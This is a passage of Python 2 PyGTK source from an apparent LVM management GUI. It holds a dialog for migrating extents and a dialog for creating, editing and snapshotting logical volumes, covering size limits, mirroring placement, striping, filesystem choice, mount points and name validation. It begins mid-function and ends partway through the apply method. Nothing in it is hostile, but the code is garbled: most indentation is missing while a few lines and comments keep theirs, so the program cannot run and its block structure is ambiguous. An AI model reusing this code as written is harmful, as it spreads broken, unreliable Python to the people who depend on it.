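    # targets; if there is not enough free space among them an error is
    # shown and None is returned.  Returns the MigrateDialog on OK,
    # None if the user cancels.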
vg = pv.get_vg()
needed_extents = 0
for ext in exts:
needed_extents = needed_extents + ext.get_start_size()[1]
free_extents = 0
pvs = []
for p in vg.get_pvs().values():
if pv != p:
p_free_exts = p.get_extent_total_used_free()[2]
if p_free_exts >= needed_extents:
pvs.append(p)
free_extents = free_extents + p_free_exts
if needed_extents > free_extents:
self.errorMessage(_("There are not enough free extents to perform the necessary migration. Adding more physical volumes would solve the problem."))
return None
lvs = {}
for ext in exts:
lv = ext.get_lv()
lvs[lv] = lv
dlg = MigrateDialog(not removal, pvs, lvs.values())
if not dlg.run():
return None
return dlg
def on_edit_lv(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
lv = model.get_value(iter, OBJ_COL)
vg = lv.get_vg()
dlg = LV_edit_props(lv, vg, self.model_factory, self.command_handler)
if dlg.run() == False:
return
apply(self.reset_tree_model, [vg.get_name()])
def on_create_snapshot(self, button):
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
lv = model.get_value(iter, OBJ_COL)
vg = lv.get_vg()
if vg.get_max_lvs() == len(vg.get_lvs().values()):
self.errorMessage(EXCEEDED_MAX_LVS)
return
# checks
if lv.is_snapshot():
self.errorMessage(ALREADY_A_SNAPSHOT)
return
if lv.is_mirrored():
self.errorMessage(CANNOT_SNAPSHOT_A_MIRROR)
return
t_exts, u_exts, f_exts = vg.get_extent_total_used_free()
if f_exts == 0:
self.errorMessage(NOT_ENOUGH_SPACE_FOR_NEW_LV % vg.get_name())
return
if self.command_handler.is_dm_snapshot_loaded() == False:
self.errorMessage(NO_DM_SNAPSHOT)
return
dlg = LV_edit_props(lv, vg, self.model_factory, self.command_handler, True)
if dlg.run() == False:
return
apply(self.reset_tree_model, [vg.get_name()])
#######################################################
###Convenience Dialogs
def warningMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_WARNING,
gtk.BUTTONS_YES_NO,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
    if rc in (gtk.RESPONSE_NO, gtk.RESPONSE_DELETE_EVENT, gtk.RESPONSE_CLOSE, gtk.RESPONSE_CANCEL):
      return gtk.RESPONSE_NO
    return rc
def errorMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_ERROR,
gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def infoMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO,
gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def simpleInfoMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO,
gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
    if rc in (gtk.RESPONSE_NO, gtk.RESPONSE_DELETE_EVENT, gtk.RESPONSE_CLOSE, gtk.RESPONSE_CANCEL):
      return gtk.RESPONSE_NO
    return rc
def register_highlighted_sections(self, section_type, section_list):
self.section_type = section_type
self.section_list = section_list
def clear_highlighted_sections(self):
self.section_type = UNSELECTABLE_TYPE
self.section_list = None
class MigrateDialog:
def __init__(self, migrate, pvs, lvs):
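    # Wraps the migrate_extents glade dialog.  'pvs' fills the target PV
    # combo box and 'lvs' the LV combo box; when 'migrate' is False the
    # dialog is run as part of a removal, so the LV selection is hidden
    # and an explanatory message is shown instead.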
gladepath = 'migrate_extents.glade'
if not os.path.exists(gladepath):
gladepath = "%s/%s" % (INSTALLDIR, gladepath)
gtk.glade.bindtextdomain(PROGNAME)
self.glade_xml = gtk.glade.XML (gladepath, domain=PROGNAME)
# fill out lv selection combobox
self.lv_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('lv_selection_container').pack_end(self.lv_combo)
self.lv_combo.show()
self.lv_combo.set_sensitive(False)
for lv in lvs:
self.lv_combo.append_text(lv.get_name())
model = self.lv_combo.get_model()
iter = model.get_iter_first()
self.lv_combo.set_active_iter(iter)
# fill out pv selection combobox
pv_selection_container = self.glade_xml.get_widget('pv_selection_container')
self.pv_combo = gtk.combo_box_new_text()
pv_selection_container.pack_end(self.pv_combo)
self.pv_combo.show()
self.pv_combo.set_sensitive(False)
if len(pvs) != 0:
for p in pvs:
self.pv_combo.append_text(p.get_path())
model = self.pv_combo.get_model()
iter = model.get_iter_first()
self.pv_combo.set_active_iter(iter)
else:
pv_selection_container.hide()
self.dlg = self.glade_xml.get_widget('dialog1')
msg_label = self.glade_xml.get_widget('msg_label')
self.dlg.set_title(_("Migrate extents"))
if migrate:
msg_label.hide()
else:
# remove
self.glade_xml.get_widget('lv_selection_container').hide()
# events
self.glade_xml.get_widget('choose_pv_radio').connect('clicked', self.on_choose_pv_radio)
self.glade_xml.get_widget('choose_lv_check').connect('clicked', self.on_choose_lv_check)
def on_choose_pv_radio(self, obj1):
if self.glade_xml.get_widget('choose_pv_radio').get_active():
self.pv_combo.set_sensitive(True)
else:
self.pv_combo.set_sensitive(False)
def on_choose_lv_check(self, obj1):
if self.glade_xml.get_widget('choose_lv_check').get_active():
self.lv_combo.set_sensitive(True)
else:
self.lv_combo.set_sensitive(False)
def run(self):
rc = self.dlg.run()
self.dlg.hide()
return rc == gtk.RESPONSE_OK
# return [pv to migrate to, policy (0 - inherit, 1 - normal, 2 - contiguous, 3 - anywhere), lv to migrate from]
def get_data(self):
ret = []
# migrate extents to
if self.glade_xml.get_widget('choose_pv_radio').get_active() == True:
iter = self.pv_combo.get_active_iter()
ret.append(self.pv_combo.get_model().get_value(iter, 0))
else:
ret.append(None)
if self.glade_xml.get_widget('radiobutton4').get_active():
ret.append(0)
elif self.glade_xml.get_widget('radiobutton5').get_active():
ret.append(1)
elif self.glade_xml.get_widget('radiobutton6').get_active():
ret.append(2)
else:
ret.append(3)
# lv to migrate from
if self.glade_xml.get_widget('choose_lv_check').get_active():
iter = self.lv_combo.get_active_iter()
ret.append(self.lv_combo.get_model().get_value(iter, 0))
else:
ret.append(None)
return ret
class LV_edit_props:
# set lv to None if new lv is to be created
def __init__(self, lv, vg, model_factory, command_handler, snapshot=False):
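    # 'snapshot' == True turns the dialog into a "create a snapshot of lv"
    # dialog; otherwise an existing lv is edited, or a new one is created
    # when lv is None (see the note above).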
self.snapshot = snapshot
if lv == None:
self.new = True
self.snapshot = False
else:
if self.snapshot:
self.new = True
else:
self.new = False
self.lv = lv
self.vg = vg
self.model_factory = model_factory
self.command_handler = command_handler
# available filesystems
self.filesystems = dict()
fss = Filesystem.get_filesystems()
self.fs_none = fss[0]
for fs in fss:
self.filesystems[fs.name] = fs
if self.new:
if self.snapshot:
self.fs = Filesystem.get_fs(self.lv.get_path())
self.filesystems[self.fs.name] = self.fs
else:
self.fs = self.fs_none
self.mount_point = ''
self.mount = False
self.mount_at_reboot = False
else:
self.fs = Filesystem.get_fs(lv.get_path())
if self.fs.name == self.fs_none.name:
self.fs = self.fs_none
else:
self.filesystems.pop(self.fs_none.name)
self.filesystems[self.fs.name] = self.fs
self.mount_point = self.model_factory.getMountPoint(lv.get_path())
self.mountpoint_at_reboot = Fstab.get_mountpoint(lv.get_path().strip())
if self.mount_point == None:
if self.mountpoint_at_reboot == None:
self.mount_point = ''
else:
self.mount_point = self.mountpoint_at_reboot
self.mount = False
else:
self.mount = True
self.mount_at_reboot = (self.mountpoint_at_reboot != None)
for fs_name in self.filesystems:
self.filesystems[fs_name].set_clustered(vg.clustered())
gladepath = 'lv_edit_props.glade'
if not os.path.exists(gladepath):
gladepath = "%s/%s" % (INSTALLDIR, gladepath)
gtk.glade.bindtextdomain(PROGNAME)
self.glade_xml = gtk.glade.XML (gladepath, domain=PROGNAME)
self.dlg = self.glade_xml.get_widget('dialog1')
self.size_units_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('size_units_container').pack_end(self.size_units_combo)
self.size_units_combo.show()
self.filesys_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('filesys_container').pack_start(self.filesys_combo)
self.filesys_combo.show()
self.fs_config_button = gtk.Button(_("Options"))
self.glade_xml.get_widget('filesys_container').pack_end(self.fs_config_button)
#self.fs_config_button.show()
self.fs_config_button.hide()
def run(self):
need_reload = False
self.setup_dlg()
while True:
rc = self.dlg.run()
if rc == gtk.RESPONSE_REJECT:
self.setup_dlg()
continue
elif rc == gtk.RESPONSE_OK:
try:
if self.apply() == True:
need_reload = True
break
except CommandError, e:
self.errorMessage(e.getMessage())
need_reload = True
break
else:
break
self.dlg.hide()
return need_reload
def setup_dlg(self):
# title
if self.new:
if self.snapshot:
self.dlg.set_title(_("Create A Snapshot of %s") % self.lv.get_name())
else:
self.dlg.set_title(_("Create New Logical Volume"))
else:
if self.lv.is_snapshot():
message = _("Edit %s, a Snapshot of %s")
self.dlg.set_title(message % (self.lv.get_name(), self.lv.get_snapshot_info()[0].get_name()))
else:
self.dlg.set_title(_("Edit Logical Volume"))
# lv name
self.name_entry = self.glade_xml.get_widget('lv_name')
if self.new:
self.name_entry.set_text('')
else:
self.name_entry.set_text(self.lv.get_name())
# revert button
if self.new:
self.glade_xml.get_widget('revert_button').hide()
else:
self.glade_xml.get_widget('revert_button').show()
# lv properties
# TODO: use ACCEPTABLE_STRIPE_SIZES
stripe_size_combo = self.glade_xml.get_widget('stripe_size')
model = stripe_size_combo.get_model()
iter = model.get_iter_first()
stripe_size_combo.set_active_iter(iter)
if self.new:
if self.snapshot:
self.glade_xml.get_widget('lv_properties_frame').hide()
else:
self.glade_xml.get_widget('stripes_container').set_sensitive(False)
stripe_size_combo = self.glade_xml.get_widget('stripe_size')
model = stripe_size_combo.get_model()
iter = model.get_iter_first()
stripe_size_combo.set_active_iter(iter)
max_stripes = len(self.vg.get_pvs())
if max_stripes > 8:
max_stripes = 8
self.glade_xml.get_widget('stripes_num').set_range(2, max_stripes)
self.glade_xml.get_widget('stripes_num').set_update_policy(gtk.UPDATE_IF_VALID)
else:
if self.lv.is_snapshot():
self.glade_xml.get_widget('lv_properties_frame').hide()
else:
self.glade_xml.get_widget('linear').hide()
self.glade_xml.get_widget('striped').hide()
self.glade_xml.get_widget('stripes_container').hide()
# filesystem
self.glade_xml.get_widget('filesys_container').remove(self.filesys_combo)
self.filesys_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('filesys_container').pack_start(self.filesys_combo)
self.filesys_combo.show()
self.filesys_combo.append_text(self.fs.name)
for filesys in self.filesystems:
if (self.fs.name != filesys) and self.filesystems[filesys].creatable:
self.filesys_combo.append_text(filesys)
model = self.filesys_combo.get_model()
iter = model.get_iter_first()
self.filesys_combo.set_active_iter(iter)
self.filesys_show_hide()
if self.snapshot:
self.glade_xml.get_widget('filesys_container').set_sensitive(False)
elif not self.new:
if self.lv.is_snapshot():
self.glade_xml.get_widget('filesys_container').set_sensitive(False)
self.mountpoint_entry = self.glade_xml.get_widget('mount_point')
if self.new:
self.mountpoint_entry.set_text('')
else:
self.mountpoint_entry.set_text(self.mount_point)
self.glade_xml.get_widget('mount').set_active(self.mount)
self.glade_xml.get_widget('mount_at_reboot').set_active(self.mount_at_reboot)
self.on_mount_changed(None)
# size
self.size_scale = self.glade_xml.get_widget('size_scale')
self.size_entry = self.glade_xml.get_widget('size_entry')
self.glade_xml.get_widget('size_units_container').remove(self.size_units_combo)
self.size_units_combo = gtk.combo_box_new_text()
self.glade_xml.get_widget('size_units_container').pack_end(self.size_units_combo)
self.size_units_combo.show()
for unit in [EXTENTS, GIGABYTES, MEGABYTES, KILOBYTES]:
self.size_units_combo.append_text(unit)
model = self.size_units_combo.get_model()
iter = model.get_iter_first()
self.size_units_combo.set_active_iter(iter)
# in extents
self.extent_size = self.vg.get_extent_size()
self.size_lower = 1
if self.new:
self.size = 0
else:
self.size = self.lv.get_extent_total_used_free()[0]
self.size_upper = self.vg.get_extent_total_used_free()[2] + self.size
self.set_size_new(self.size)
self.update_size_limits()
self.change_size_units()
# mirroring
if self.new:
self.mirror_to_diff_hds = None # prompt for option
self.glade_xml.get_widget('enable_mirroring').set_active(False)
else:
already_mirrored = self.lv.is_mirrored()
if already_mirrored:
self.mirror_to_diff_hds = False # mirror not resizable => don't care for now
else:
self.mirror_to_diff_hds = None # prompt for option
self.glade_xml.get_widget('enable_mirroring').set_active(already_mirrored)
    self.mirror_to_diff_hds = False # overrides the choices above, so the image-placement question below is never asked
if MIRRORING_UI_SUPPORT == False:
if self.new:
self.glade_xml.get_widget('enable_mirroring').hide()
else:
self.glade_xml.get_widget('lv_properties_frame').hide()
# set up mirror limits
self.on_enable_mirroring(None)
# events
self.fs_config_button.connect('clicked', self.on_fs_config)
self.filesys_combo.connect('changed', self.on_fs_change)
self.size_units_combo.connect('changed', self.on_units_change)
self.size_scale.connect('adjust-bounds', self.on_size_change_scale)
self.size_entry.connect('focus-out-event', self.on_size_change_entry)
self.glade_xml.get_widget('linear').connect('clicked', self.on_linear_changed)
self.glade_xml.get_widget('enable_mirroring').connect('clicked', self.on_enable_mirroring)
self.glade_xml.get_widget('striped').connect('clicked', self.on_striped_changed)
self.glade_xml.get_widget('mount').connect('clicked', self.on_mount_changed)
self.glade_xml.get_widget('mount_at_reboot').connect('clicked', self.on_mount_changed)
self.glade_xml.get_widget('use_remaining_button').connect('clicked', self.on_use_remaining)
def on_linear_changed(self, obj):
if self.glade_xml.get_widget('linear').get_active() == False:
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.glade_xml.get_widget('enable_mirroring').set_sensitive(False)
return
else:
self.glade_xml.get_widget('stripes_container').set_sensitive(False)
self.glade_xml.get_widget('enable_mirroring').set_sensitive(True)
def on_striped_changed(self, obj):
if self.glade_xml.get_widget('striped').get_active() == False:
return
pv_list = self.vg.get_pvs()
if len(pv_list) < 2: #striping is not an option
self.errorMessage(CANT_STRIPE_MESSAGE)
self.glade_xml.get_widget('linear').set_active(True)
return
else:
self.glade_xml.get_widget('stripes_container').set_sensitive(True)
def on_enable_mirroring(self, obj):
if self.glade_xml.get_widget('enable_mirroring').get_active() == False:
self.update_size_limits()
return
# is mirroring supported by lvm version in use?
if self.model_factory.is_mirroring_supported() == False:
self.errorMessage(_("Underlying Logical Volume Management does not support mirroring"))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
# check if lv is striped - no mirroring
if not self.new:
if self.lv.is_striped():
self.errorMessage(_("Striped Logical Volumes cannot be mirrored."))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
# check if lv is origin - no mirroring
if not self.new:
if self.lv.has_snapshots() and not self.lv.is_mirrored():
self.errorMessage(_("Logical Volumes with associated snapshots cannot be mirrored yet."))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
# mirror images placement: diff HDs or anywhere
if self.mirror_to_diff_hds == None: # prompt
rc = self.questionMessage(_("The primary purpose of mirroring is to protect data in the case of hard drive failure. Do you want to place mirror images onto different hard drives?"))
if rc == gtk.RESPONSE_YES:
self.mirror_to_diff_hds = True
else:
self.mirror_to_diff_hds = False
max_mirror_size = self.__get_max_mirror_data(self.vg)[0]
if max_mirror_size == 0:
if self.mirror_to_diff_hds:
self.errorMessage(_("Less than 3 hard drives are available with free space. Disabling mirroring."))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
else:
self.errorMessage(_("There must be free space on at least three Physical Volumes to enable mirroring"))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
if self.size_new > max_mirror_size:
if self.new:
self.update_size_limits(max_mirror_size)
self.infoMessage(_("The size of the Logical Volume has been adjusted to the maximum available size for mirrors."))
self.size_entry.select_region(0, (-1))
self.size_entry.grab_focus()
else:
if self.lv.is_mirrored() == False:
message = _("There is not enough free space to add mirroring. Reduce size of Logical Volume to at most %s, or add Physical Volumes.")
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
reduce_to_string = str(self.__get_num(max_mirror_size)) + ' ' + units
self.errorMessage(message % reduce_to_string)
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.size_entry.select_region(0, (-1))
self.size_entry.grab_focus()
else:
self.update_size_limits()
else:
self.update_size_limits(max_mirror_size)
def __get_max_mirror_data(self, vg):
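    # Work out how large a mirror can be created in 'vg' and where to place
    # it.  Returns a 4-tuple, e.g.
    #   max_size, img1_pvs, img2_pvs, log_pvs = self.__get_max_mirror_data(vg)
    # where max_size is in extents.  When self.mirror_to_diff_hds is set,
    # PVs are first grouped by underlying hard drive so that the two mirror
    # images end up on different drives.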
# copy pvs into list
free_list = []
for pv in vg.get_pvs().values():
free_extents = pv.get_extent_total_used_free()[2]
# add extents of current LV
if not self.new:
if self.lv.is_mirrored():
lvs_to_match = self.lv.get_segments()[0].get_images()
else:
lvs_to_match = [self.lv]
for ext in pv.get_extent_blocks():
if ext.get_lv() in lvs_to_match:
free_extents = free_extents + ext.get_start_size()[1]
if free_extents != 0:
free_list.append((free_extents, pv))
if self.mirror_to_diff_hds:
## place mirror onto different hds ##
# group pvs into hd groups
devices = {}
for t in free_list:
pv = t[1]
pv_free = t[0]
device_name_in_list = None
for devname in pv.getDevnames():
if devname in devices.keys():
device_name_in_list = devname
if device_name_in_list == None:
if len(pv.getDevnames()) == 0:
            # no known devnames
devices[pv.get_path()] = [pv_free, [[pv_free, pv]]]
else:
# not in the list
devices[pv.getDevnames()[0]] = [pv_free, [[pv_free, pv]]]
else:
devices[device_name_in_list][0] = devices[device_name_in_list][0] + pv_free
devices[device_name_in_list][1].append([pv_free, pv])
free_list = devices.values()
if len(devices.keys()) < 3:
return 0, [], [], []
# sort free_list
for i in range(len(free_list) - 1, 0, -1):
for j in range(0, i):
if free_list[j][0] < free_list[j + 1][0]:
tmp = free_list[j + 1]
free_list[j + 1] = free_list[j]
free_list[j] = tmp
# sort within free_list
for t in free_list:
sort_me = t[1]
for i in range(len(sort_me) - 1, 0, -1):
for j in range(0, i):
if sort_me[j][0] < sort_me[j + 1][0]:
tmp = sort_me[j + 1]
sort_me[j + 1] = sort_me[j]
sort_me[j] = tmp
# create list of largest partitions
largest_list = []
for t in free_list:
t_largest_size = t[1][0][0]
t_largest_pv = t[1][0][1]
largest_list.append([t_largest_size, t_largest_pv])
# sort largest list
for i in range(len(largest_list) - 1, 0, -1):
for j in range(0, i):
if largest_list[j][0] < largest_list[j + 1][0]:
tmp = largest_list[j + 1]
largest_list[j + 1] = largest_list[j]
largest_list[j] = tmp
return largest_list[1][0], [largest_list[0][1]], [largest_list[1][1]], [largest_list.pop()[1]]
else:
## place mirror anywhere, even on the same hd :( ##
if len(free_list) < 3:
return 0, [], [], []
# sort
for i in range(len(free_list) - 1, 0, -1):
for j in range(0, i):
if free_list[j][0] < free_list[j + 1][0]:
tmp = free_list[j + 1]
free_list[j + 1] = free_list[j]
free_list[j] = tmp
# remove smallest one for log
log = free_list.pop()[1]
# place pvs into buckets of similar size
buck1, s1 = [free_list[0][1]], free_list[0][0]
buck2, s2 = [free_list[1][1]], free_list[1][0]
for t in free_list[2:]:
if s1 < s2:
s1 = s1 + t[0]
buck1.append(t[1])
else:
s2 = s2 + t[0]
buck2.append(t[1])
max_m_size = 0
if s1 < s2:
max_m_size = s1
else:
max_m_size = s2
return max_m_size, buck1, buck2, [log]
def on_mount_changed(self, obj):
m1 = self.glade_xml.get_widget('mount').get_active()
m2 = self.glade_xml.get_widget('mount_at_reboot').get_active()
if m1 or m2:
self.mountpoint_entry.set_sensitive(True)
else:
self.mountpoint_entry.set_sensitive(False)
def on_fs_config(self, button):
pass
def on_fs_change(self, obj):
self.filesys_show_hide()
# go thru on_enable_mirroring() to get to update_size_limits,
# that in turn disables resizing if fs doesn't support that
self.on_enable_mirroring(None)
def filesys_show_hide(self):
iter = self.filesys_combo.get_active_iter()
filesys = self.filesystems[self.filesys_combo.get_model().get_value(iter, 0)]
if filesys.editable:
self.fs_config_button.set_sensitive(True)
else:
self.fs_config_button.set_sensitive(False)
if filesys.mountable:
self.glade_xml.get_widget('mountpoint_container').set_sensitive(True)
self.glade_xml.get_widget('mount_container').set_sensitive(True)
else:
self.glade_xml.get_widget('mount').set_active(False)
self.glade_xml.get_widget('mount_at_reboot').set_active(False)
self.glade_xml.get_widget('mountpoint_container').set_sensitive(False)
self.glade_xml.get_widget('mount_container').set_sensitive(False)
def update_size_limits(self, upper=None):
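    # Recompute the allowed size range from the VG's free extents and the
    # selected filesystem's resize capabilities, then enable or disable the
    # size widgets accordingly.  Snapshot origins and (for now) mirrored LVs
    # cannot be resized.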
iter = self.filesys_combo.get_active_iter()
filesys = self.filesystems[self.filesys_combo.get_model().get_value(iter, 0)]
fs_resizable = (filesys.extendable_online or filesys.extendable_offline or filesys.reducible_online or filesys.reducible_offline)
if not self.new:
if fs_resizable:
self.glade_xml.get_widget('fs_not_resizable').hide()
else:
self.glade_xml.get_widget('fs_not_resizable').show()
if self.lv.has_snapshots():
self.glade_xml.get_widget('origin_not_resizable').show()
self.glade_xml.get_widget('free_space_label').hide()
self.size_scale.set_sensitive(False)
self.size_entry.set_sensitive(False)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(False)
self.glade_xml.get_widget('remaining_space_label').hide()
return
elif self.lv.is_mirrored():
if self.glade_xml.get_widget('enable_mirroring').get_active():
self.glade_xml.get_widget('mirror_not_resizable').show()
self.glade_xml.get_widget('free_space_label').hide()
self.size_scale.set_sensitive(False)
self.size_entry.set_sensitive(False)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(False)
self.glade_xml.get_widget('remaining_space_label').hide()
self.set_size_new(self.size)
return
else:
self.glade_xml.get_widget('mirror_not_resizable').hide()
self.glade_xml.get_widget('free_space_label').show()
self.size_scale.set_sensitive(True)
self.size_entry.set_sensitive(True)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(True)
self.glade_xml.get_widget('remaining_space_label').show()
self.size_lower = 1
if upper == None:
self.size_upper = self.vg.get_extent_total_used_free()[2] + self.size
else:
self.size_upper = upper
as_new = self.new
fs_change = not (filesys == self.fs)
if fs_change:
as_new = True
if as_new:
self.glade_xml.get_widget('fs_not_resizable').hide()
self.glade_xml.get_widget('free_space_label').show()
self.size_scale.set_sensitive(True)
self.size_entry.set_sensitive(True)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(True)
self.glade_xml.get_widget('remaining_space_label').show()
else:
if not (filesys.extendable_online or filesys.extendable_offline):
self.size_upper = self.size
if not (filesys.reducible_online or filesys.reducible_offline):
self.size_lower = self.size
if fs_resizable:
self.glade_xml.get_widget('fs_not_resizable').hide()
self.glade_xml.get_widget('free_space_label').show()
self.size_scale.set_sensitive(True)
self.size_entry.set_sensitive(True)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(True)
self.glade_xml.get_widget('remaining_space_label').show()
else:
self.glade_xml.get_widget('fs_not_resizable').show()
self.glade_xml.get_widget('free_space_label').hide()
self.size_scale.set_sensitive(False)
self.size_entry.set_sensitive(False)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(False)
self.glade_xml.get_widget('remaining_space_label').hide()
# set old size value
self.set_size_new(self.size)
if self.size_lower < self.size_upper:
self.glade_xml.get_widget('size_scale_container').set_sensitive(True)
else:
self.glade_xml.get_widget('size_scale_container').set_sensitive(False)
# update values to be within limits
self.change_size_units()
self.set_size_new(self.size_new)
def on_units_change(self, obj):
self.change_size_units()
def change_size_units(self):
lower = self.__get_num(self.size_lower)
upper = self.__get_num(self.size_upper)
size_beg_label = self.glade_xml.get_widget('size_beg')
size_beg_label.set_text(str(lower))
size_end_label = self.glade_xml.get_widget('size_end')
size_end_label.set_text(str(upper))
if self.size_lower < self.size_upper:
self.size_scale.set_range(lower, upper)
self.set_size_new(self.size_new)
def update_remaining_space_label(self):
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
rem = self.size_upper - self.size_new
rem_vg = self.vg.get_extent_total_used_free()[2]
if self.glade_xml.get_widget('enable_mirroring').get_active():
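      # a mirrored LV consumes two copies of the data extents plus one
      # extent for the mirror log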
mirror_log_size = 1
rem_vg = rem_vg + (self.size - self.size_new) * 2 - mirror_log_size
else:
rem_vg = rem_vg - self.size_new + self.size
string_vg = REMAINING_SPACE_VG + str(self.__get_num(rem_vg)) + ' ' + units
self.glade_xml.get_widget('free_space_label').set_text(string_vg)
string = REMAINING_SPACE_AFTER + str(self.__get_num(rem)) + ' ' + units
self.glade_xml.get_widget('remaining_space_label').set_text(string)
def on_use_remaining(self, obj):
self.set_size_new(self.size_upper)
def on_size_change_scale(self, obj1, obj2):
size = self.size_scale.get_value()
self.set_size_new(self.__get_extents(size))
def on_size_change_entry(self, obj1, obj2):
size_text = self.size_entry.get_text()
size_float = 0.0
try: ##In case gibberish is entered into the size field...
size_float = float(size_text)
except ValueError, e:
self.size_entry.set_text(str(self.__get_num(self.size_new)))
return False
self.set_size_new(self.__get_extents(size_float))
return False
def set_size_new(self, exts):
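    # Clamp the requested size (in extents) to the allowed range and keep
    # the entry, the slider and the remaining-space labels in sync.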
size = exts
if size > self.size_upper:
size = self.size_upper
elif size < self.size_lower:
size = self.size_lower
self.size_new = size
size_units = self.__get_num(size)
self.size_entry.set_text(str(size_units))
self.size_scale.set_value(size_units)
self.update_remaining_space_label()
def __get_extents(self, num):
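    # Convert a size expressed in the currently selected units into a whole
    # number of extents (never less than one).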
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
if units == EXTENTS:
return int(num)
elif units == GIGABYTES:
num = int(num * 1024 * 1024 * 1024 / self.extent_size)
elif units == MEGABYTES:
num = int(num * 1024 * 1024 / self.extent_size)
elif units == KILOBYTES:
num = int(num * 1024 / self.extent_size)
if num < 1:
num = 1
return num
def __get_num(self, extents):
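    # Convert an extent count into the currently selected units, rounded to
    # two decimal places.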
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
if units == EXTENTS:
return int(extents)
elif units == GIGABYTES:
val = extents * self.extent_size / 1024.0 / 1024.0 / 1024.0
elif units == MEGABYTES:
val = extents * self.extent_size / 1024.0 / 1024.0
elif units == KILOBYTES:
val = extents * self.extent_size / 1024.0
string = '%.2f' % float(val)
return float(string)
def apply(self):
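    # Read the widget values, run the validation ladder (name syntax,
    # uniqueness within the VG, mount point), then either create a new LV
    # (optionally striped, mirrored or a snapshot, plus filesystem, mount
    # and fstab handling) or apply the changes to an existing one (rename,
    # resize with filesystem grow/shrink, filesystem change, mirroring and
    # mount changes).  Returns True when the caller needs to reload.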
name_new = self.name_entry.get_text().strip()
size_new = int(self.size_new) # in extents
iter = self.filesys_combo.get_active_iter()
filesys_new = self.filesystems[self.filesys_combo.get_model().get_value(iter, 0)]
if filesys_new.mountable:
mount_new = self.glade_xml.get_widget('mount').get_active()
mount_at_reboot_new = self.glade_xml.get_widget('mount_at_reboot').get_active()
mountpoint_new = self.mountpoint_entry.get_text().strip()
else:
mount_new = False
mount_at_reboot_new = False
mountpoint_new = ''
mirrored_new = self.glade_xml.get_widget('enable_mirroring').get_active()
striped = self.glade_xml.get_widget('striped').get_active()
stripe_size_combo = self.glade_xml.get_widget('stripe_size')
iter = stripe_size_combo.get_active_iter()
stripe_size = int(stripe_size_combo.get_model().get_value(iter, 0))
stripes_num = int(self.glade_xml.get_widget('stripes_num').get_value_as_int())
# TODO
fs_options_changed = False
# validation Ladder
# name
if name_new == '':
self.errorMessage(MUST_PROVIDE_NAME)
return False
# illegal characters
invalid_lvname_message = ''
if re.match('snapshot', name_new) or re.match('pvmove', name_new):
invalid_lvname_message = _("Names beginning with \"snapshot\" or \"pvmove\" are reserved keywords.")
elif re.search('_mlog', name_new) or re.search('_mimage', name_new):
invalid_lvname_message = _("Names containing \"_mlog\" or \"_mimage\" are reserved keywords.")
elif name_new[0] == '-':
invalid_lvname_message = _("Names beginning with a \"-\" are invalid")
elif name_new == '.' or name_new == '..':
invalid_lvname_message = _("Name can be neither \".\" nor \"..\"")
else:
for t in name_new:
if t in string.ascii_letters + string.digits + '._-+':
continue
elif t in string.whitespace:
invalid_lvname_message = _("Whitespaces are not allowed in Logical Volume names")
break
else:
invalid_lvname_message = _("Invalid character \"%s\" in Logical Volume name") % t
break
if invalid_lvname_message != '':
self.errorMessage(invalid_lvname_message)
self.name_entry.select_region(0, (-1))
self.name_entry.grab_focus()
return False
# Name must be unique for this VG
for lv in self.vg.get_lvs().values():
if lv.get_name() == name_new:
if not self.new:
if self.lv.get_name() == name_new:
continue
self.name_entry.select_region(0, (-1))
self.name_entry.grab_focus()
self.errorMessage(NON_UNIQUE_NAME % name_new)
return False
# check mountpoint
if mount_new or mount_at_reboot_new:
if mountpoint_new == '':
self.errorMessage(_("Please specify mount point"))
return False
# create folder if it doesn't exist
if os.path.exists(mountpoint_new) == False: ###stat mnt point
rc = self.questionMessage(BAD_MNT_POINT % mountpoint_new)
if (rc == gtk.RESPONSE_YES): #create mount point
try:
os.mkdir(mountpoint_new)
except OSError, e:
self.errorMessage(BAD_MNT_CREATION % mountpoint_new)
self.mountpoint_entry.set_text('')
return False
else:
self.mountpoint_entry.select_region(0, (-1))
return False
# action
if self.new:
### new LV ###
# create LV
new_lv_command_set = {}
new_lv_command_set[NEW_LV_NAME_ARG] = name_new
new_lv_command_set[NEW_LV_VGNAME_ARG] = self.vg.get_name()
new_lv_command_set[NEW_LV_UNIT_ARG] = EXTENT_IDX
new_lv_command_set[NEW_LV_SIZE_ARG] = size_new
new_lv_command_set[NEW_LV_IS_STRIPED_ARG] = striped
new_lv_command_set[NEW_LV_MIRRORING] = mirrored_new
if striped == True:
new_lv_command_set[NEW_LV_STRIPE_SIZE_ARG] = stripe_size
